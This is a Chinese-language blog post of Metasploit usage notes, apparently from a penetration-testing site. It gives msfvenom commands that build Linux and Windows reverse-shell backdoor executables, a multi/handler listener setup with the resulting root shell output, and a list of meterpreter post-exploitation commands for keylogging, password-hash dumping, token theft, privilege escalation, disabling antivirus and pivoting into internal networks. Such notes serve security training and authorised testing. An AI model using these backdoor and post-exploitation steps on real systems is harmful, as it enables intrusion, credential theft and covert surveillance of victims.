MSF工具使用笔记
August 16, 2020 WEB渗透测试 访问: 66 次
小技巧
exploit -j -z#-j(计划任务下进行攻击,后台) -z(攻击完成不遇会话交互)
sessions -l # (查看会话)
sessions -i 2 # 选择会话
sessions -k 2 # 结束会话
ctrl+z #back 会话
生成linux后门可执行程序
1、利用MsfVenom生成linux后门文件
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
Options:
-l, --list <type> List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload <payload> Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload <value>'s standard, advanced and evasion options
-f, --format <format> Output format (use --list formats to list)
-e, --encoder <encoder> The encoder to use (use --list encoders to list)
--sec-name <value> The new section name to use when generating large Windows binaries. Default: random 4-character alpha string
--smallest Generate the smallest possible payload using all available encoders
--encrypt <value> The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key <value> A key to be used for --encrypt
--encrypt-iv <value> An initialization vector for --encrypt
-a, --arch <arch> The architecture to use for --payload and --encoders (use --list archs to list)
--platform <platform> The platform for --payload (use --list platforms to list)
-o, --out <path> Save the payload to a file
-b, --bad-chars <list> Characters to avoid example: '\x00\xff'
-n, --nopsled <length> Prepend a nopsled of [length] size on to the payload
--pad-nops Use nopsled size specified by -n <length> as the total payload size, auto-prepending a nopsled of quantity (nops minus payload length)
-s, --space <length> The maximum size of the resulting payload
--encoder-space <length> The maximum size of the encoded payload (defaults to the -s value)
-i, --iterations <count> The number of times to encode the payload
-c, --add-code <path> Specify an additional win32 shellcode file to include
-x, --template <path> Specify a custom executable file to use as a template
-k, --keep Preserve the --template behaviour and inject the payload as a new thread
-v, --var-name <value> Specify a custom variable name to use for certain output formats
-t, --timeout <second> The number of seconds to wait when reading the payload from STDIN (default 30, 0 to disable)
-h, --help Show this message
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=10001 -f elf > shell.elf
2、在攻击机器上进行端口监听
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (linux/x64/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > set LHOST 192.168.1.106
LHOST => 192.168.1.106
msf5 exploit(multi/handler) > set LPORT 10001
LPORT => 10001
msf5 exploit(multi/handler) > exploit
3、在靶机上运行生成的可执行程序
4、攻击机上接收到shell
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.106:10001
[*] Sending stage (38 bytes) to 192.168.1.107
[*] Command shell session 1 opened (192.168.1.106:10001 -> 192.168.1.107:39950) at 2020-08-16 14:08:19 +0800
ls
shell.elf
whoami
root
生成windows后门可执行程序
生成木马文件:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.211 LPORT=10001 -f exe > shell.exe
在msf里进行监听,还是利用exploit(multi/handler)模块
启动时报错
root@Kali:~# msfconsole
[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: could not connect to server: Connection refused
Is the server running on host "localhost" (::1) and accepting
TCP/IP connections on port 5432?
could not connect to server: Connection refused
Is the server running on host "localhost" (127.0.0.1) and accepting
TCP/IP connections on port 5432?
解决办法:
service postgresql start
初始化Metasploit数据库:msfdb init
Meterpreter后攻击
set payload windows/x64/meterpreter_reverse_tcp
msf5 > msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.43.211 LPORT=10001 -f exe > shell.exe
一些命令
meterpreter > background 放回后台
meterpreter > exit 关闭会话
meterpreter > help 帮助信息
meterpreter > Sysinfo系统平台信息
meterpreter > screenshot 屏幕截取
meterpreter > shell 命令行shell (exit退出)
meterpreter > getlwd 查看本地目录
meterpreter > lcd 切换本地目录
meterpreter > getwd 查看目录
meterpreter > ls 查看文件目录列表
meterpreter > cd 切换目录
meterpreter > rm 删除文件
meterpreter > download C:\\Users\\123\\Desktop\\1.txt 1.txt 下载文件
meterpreter > upload /var/www/wce.exe wce.exe 上传文件
meterpreter > search -d c: -f *.doc 搜索文件
meterpreter > execute -f cmd.exe -i 执行程序/命令
meterpreter > ps 查看进程
meterpreter > run post/windows/capture/keylog_recorder 键盘记录
meterpreter > getuid 查看当前用户权限
meterpreter > use priv 加载特权模块
meterpreter > getsystem 提升到SYSTEM权限
meterpreter > hashdump 导出密码散列
meterpreter > ps 查看高权限用户PID
meterpreter > steal_token <PID> 窃取令牌
meterpreter > rev2self 恢复原来的令牌
meterpreter > migrate pid 迁移进程
meterpreter > run killav 关闭杀毒软件
meterpreter > run getgui-e 启用远程桌面
meterpreter > portfwd add -l 1234 -p 3389 -r <目标IP> 端口转发
meterpreter > run get_local_subnets 获取内网网段信息
meterpreter > run autoroute -s <内网网段> 创建自动路由
meterpreter > run autoroute -p 查看自动路由表
创建代理通道:
msf > use auxiliary/server/socks4a 设置socks4代理模块
msf auxiliary(socks4a) > show options
msf auxiliary(socks4a) > run
配置proxychains参数:
nano /etc/proxychains.conf 修改代理监听端口,和前面端口一致
quite_mode 设置成安静模式:去掉如下参数前面的注释